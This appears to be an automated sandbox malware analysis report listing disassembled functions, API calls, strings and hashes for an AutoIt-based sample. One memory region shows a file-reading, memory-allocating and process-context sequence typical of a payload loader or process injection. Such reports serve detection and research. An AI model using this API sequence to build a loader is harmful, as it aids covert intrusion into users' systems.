                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                            Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                            APIs
                                                            • _malloc.LIBCMT ref: 004115F1
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • std::exception::exception.LIBCMT ref: 00411626
                                                            • std::exception::exception.LIBCMT ref: 00411640
                                                            • __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                            • String ID: ,*H$4*H$@fI
                                                            • API String ID: 615853336-1459471987
                                                            • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                            • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                            • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                            Function 02E72600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2065 2e72600-2e726ae call 2e70000 2068 2e726b5-2e726db call 2e73510 CreateFileW 2065->2068 2071 2e726e2-2e726f2 2068->2071 2072 2e726dd 2068->2072 2079 2e726f4 2071->2079 2080 2e726f9-2e72713 VirtualAlloc 2071->2080 2073 2e7282d-2e72831 2072->2073 2074 2e72873-2e72876 2073->2074 2075 2e72833-2e72837 2073->2075 2081 2e72879-2e72880 2074->2081 2077 2e72843-2e72847 2075->2077 2078 2e72839-2e7283c 2075->2078 2084 2e72857-2e7285b 2077->2084 2085 2e72849-2e72853 2077->2085 2078->2077 2079->2073 2086 2e72715 2080->2086 2087 2e7271a-2e72731 ReadFile 2080->2087 2082 2e728d5-2e728ea 2081->2082 2083 2e72882-2e7288d 2081->2083 2090 2e728ec-2e728f7 VirtualFree 2082->2090 2091 2e728fa-2e72902 2082->2091 2088 2e72891-2e7289d 2083->2088 2089 2e7288f 2083->2089 2092 2e7285d-2e72867 2084->2092 2093 2e7286b 2084->2093 2085->2084 2086->2073 2094 2e72733 2087->2094 2095 2e72738-2e72778 VirtualAlloc 2087->2095 2098 2e728b1-2e728bd 2088->2098 2099 2e7289f-2e728af 2088->2099 2089->2082 2090->2091 2092->2093 2093->2074 2094->2073 2096 2e7277f-2e7279a call 2e73760 2095->2096 2097 2e7277a 2095->2097 2105 2e727a5-2e727af 2096->2105 2097->2073 2102 2e728bf-2e728c8 2098->2102 2103 2e728ca-2e728d0 2098->2103 2101 2e728d3 2099->2101 2101->2081 2102->2101 2103->2101 2106 2e727e2-2e727f6 call 2e73570 2105->2106 2107 2e727b1-2e727e0 call 2e73760 2105->2107 2113 2e727fa-2e727fe 2106->2113 2114 2e727f8 2106->2114 2107->2105 2115 2e72800-2e72804 CloseHandle 2113->2115 2116 2e7280a-2e7280e 2113->2116 2114->2073 2115->2116 2117 2e72810-2e7281b VirtualFree 2116->2117 2118 2e7281e-2e72827 2116->2118 2117->2118 2118->2068 2118->2073
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02E726D1
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02E728F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction ID: 34426ec7de7eb01c5280c49183194482ee6c22c8e191b5c07d1d723f8d1ce6bd
                                                            • Opcode Fuzzy Hash: c604c45430315f2d7ac9edfc96fa3ed3524b16f7139e20e6f85f26396c7b052c
                                                            • Instruction Fuzzy Hash: E9A1F674E40209EBEB14CFA4C994BEEBBB5FF48304F209559E601BB280D7759A81CF95
                                                            Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2119 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2122 427190-4271ae RegQueryValueExW 2119->2122 2123 40e4eb-40e4f0 2119->2123 2124 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2122->2124 2125 42721a-42722a RegCloseKey 2122->2125 2130 427210-427219 call 436508 2124->2130 2131 4271f7-42720e call 402160 2124->2131 2130->2125 2131->2130
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: QueryValue$CloseOpen
                                                            • String ID: Include$Software\AutoIt v3\AutoIt
                                                            • API String ID: 1586453840-614718249
                                                            • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                            • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                            • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                            Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                            • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                            • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                            • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                            • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                            Function 02E723B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 2137 2e723b0-2e724f6 call 2e70000 call 2e722a0 CreateFileW 2144 2e724fd-2e7250d 2137->2144 2145 2e724f8 2137->2145 2148 2e72514-2e7252e VirtualAlloc 2144->2148 2149 2e7250f 2144->2149 2146 2e725ad-2e725b2 2145->2146 2150 2e72532-2e72549 ReadFile 2148->2150 2151 2e72530 2148->2151 2149->2146 2152 2e7254d-2e72587 call 2e722e0 call 2e712a0 2150->2152 2153 2e7254b 2150->2153 2151->2146 2158 2e725a3-2e725ab ExitProcess 2152->2158 2159 2e72589-2e7259e call 2e72330 2152->2159 2153->2146 2158->2146 2159->2158
                                                            APIs
                                                              • Part of subcall function 02E722A0: Sleep.KERNELBASE(000001F4), ref: 02E722B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02E724EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: NSPJRP4MPB2WDW78XIUGYC8NE
                                                            • API String ID: 2694422964-3204172417
                                                            • Opcode ID: f251835c78afbe6f5218fa34feab20dbbdf6e9e3ebed218ac8e54a33fcfb9715
                                                            • Instruction ID: 6539da7a0435549ea5adf09d6ab3dd669f8567f35c80638167eed91ef63eabf5
                                                            • Opcode Fuzzy Hash: f251835c78afbe6f5218fa34feab20dbbdf6e9e3ebed218ac8e54a33fcfb9715
                                                            • Instruction Fuzzy Hash: 7F519170D04288DBEF11D7B4C854BDEBBB5AF15304F049198E648BB2C1D7B91B49CBA6
                                                            Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                            • _wcsncpy.LIBCMT ref: 00401C41
                                                            • _wcscpy.LIBCMT ref: 00401C5D
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                            • String ID: Line:
                                                            • API String ID: 1874344091-1585850449
                                                            • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                            • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                            • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                            Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                            • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                            • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                            • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Close$OpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 1607946009-824357125
                                                            • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                            • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                            • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                            Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                            • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                            • _wcsncpy.LIBCMT ref: 004102ED
                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                            • _wcsncpy.LIBCMT ref: 00410340
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                            • String ID:
                                                            • API String ID: 3170942423-0
                                                            • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                            • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                            • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                            Function 02E712A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02E71A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E71AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E71B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction ID: 96a8c51623e94293418e728b8c82a0a0059cb1336776a59fd6e0cf63e94e29b6
                                                            • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                                            • Instruction Fuzzy Hash: 4F621B30A54258DBEB24CFA4C850BDEB372EF58704F1091A9D20DEB394E7759E81CB59
                                                            Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: Error:
                                                            • API String ID: 4104443479-232661952
                                                            • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                            • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                            • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                            Function 0040F520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                              • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                              • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                              • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                              • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                            • String ID: X$pWH
                                                            • API String ID: 85490731-941433119
                                                            • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                            • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                            • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                            Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 00401B57
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                            • String ID: @EXITCODE
                                                            • API String ID: 2734553683-3436989551
                                                            • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                            • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                                            • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                            Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
